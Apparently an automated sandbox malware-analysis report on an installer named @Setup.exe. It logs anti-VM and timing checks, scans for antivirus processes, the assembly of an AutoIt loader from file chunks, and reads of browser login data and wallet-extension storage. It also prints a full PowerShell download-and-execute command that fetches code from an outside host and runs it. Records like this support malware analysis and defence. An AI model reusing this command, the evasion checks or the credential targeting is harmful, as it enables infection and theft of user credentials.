      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BB27C44
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB2F3E1 second address: 6BB2F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB2F3FD second address: 6BB2F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F9594BA3A75h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F9594BA3B00h 0x00000031 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3622Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2781Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com TID: 6512Thread sleep time: -150000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep count: 3622 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2664Thread sleep count: 2781 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000002.2251383520.0000000000BCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: @Setup.exe, 00000000.00000002.1666807792.0000000000756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: powershell.exe, 00000011.00000002.2076683516.0000000007BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
      Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 504701Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E CcJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Housewares" Expressions Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Corporation.com uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; Jump to behavior
      Source: Corporation.com, 0000000C.00000000.1694698460.0000000000F43000.00000002.00000001.01000000.00000007.sdmp, Corporation.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\c9ceaed2 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 50_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,50_2_00491486
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: find.exe, 00000029.00000002.2605506592.000001F0205C0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000029.00000002.2605546242.000001F02060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
